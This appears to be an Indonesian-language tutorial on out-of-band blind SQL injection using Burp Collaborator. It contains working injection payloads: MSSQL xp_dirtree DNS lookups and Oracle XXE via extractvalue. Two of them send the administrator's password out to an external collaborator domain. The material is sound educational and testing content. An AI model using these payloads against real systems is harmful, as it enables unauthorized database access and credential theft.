Blind SQL injection: Out Of Band (OAST)

Untuk Serangan Kategori Yang Ini, Sebenarnya Tidak Terlalu Umum Untuk Dilakukan. Sebagian Besar Dikarenakan Bergantung Pada Fitur Yang Diaktifkan Server Database Yang Digunakan Oleh Web Tersebut.

Serangan Ini Terjadi Ketika Penyerang Tidak Dapat Menggunakan Saluran Yang Sama Untuk Meluncurkan Serangan Dan Untuk Mengumpulkan Hasil (Result).Teknik Serangannya, Menawarkan Penyerang Alternatif Dari Teknik Inferensial Time-based, Khususnya Apabila Respon Server Tidak Terlalu Stabil. Sehingga Membuat Serangan Inferential Time-based Tidak Dapat Diandalkan Keberhasilannya.

Cara termudah dan paling dapat diandalkan untuk menggunakan teknik out-of-band adalah menggunakan Burp Collaborator . Ini adalah server yang menyediakan implementasi kustom dari berbagai layanan jaringan (termasuk DNS), dan memungkinkan Anda mendeteksi ketika interaksi jaringan terjadi sebagai akibat dari pengiriman muatan individu ke aplikasi yang rentan. Dukungan untuk Burp Collaborator dibangun di Burp Suite Professional tanpa memerlukan konfigurasi.

Teknik untuk memicu kueri DNS sangat spesifik untuk jenis database yang digunakan. Di Microsoft SQL Server, input seperti berikut ini dapat digunakan untuk menyebabkan pencarian DNS pada domain tertentu:

`'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--`

Ini akan menyebabkan database melakukan pencarian untuk domain berikut: 0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net

Burp Suite klien Collaborator untuk menghasilkan subdomain unik dan polling server Collaborator untuk mengonfirmasi kapan pencarian DNS terjadi.

Contoh Lain Nya Cara Penggunaan Oracle:

xyz'||(SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://mg69t7wthyyoqpqomf9zec5xeoke83.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual)--

Menambah Query Lain Contoh Check Password:

xyz' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.g6n3j1mn7soigjgic9zt46vr4ia9yy.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--

Anda kemudian dapat menggunakan saluran out-of-band untuk mengekstrak data dari aplikasi yang rentan. Sebagai contoh:

`'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--`

Input ini membaca kata sandi untuk Administratorpengguna, menambahkan subdomain Kolaborator unik, dan memicu pencarian DNS. Ini akan menghasilkan pencarian DNS seperti berikut, memungkinkan Anda untuk melihat kata sandi yang diambil:

S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net

Teknik out-of-band (OAST) adalah cara yang sangat ampuh untuk mendeteksi dan mengeksploitasi injeksi SQL buta, karena kemungkinan keberhasilan yang tinggi dan kemampuan untuk secara langsung mengekstrak data dalam saluran out-of-band. Untuk alasan ini, teknik OAST sering lebih disukai bahkan dalam situasi di mana teknik lain untuk eksploitasi buta berhasil.

Last updated

Was this helpful?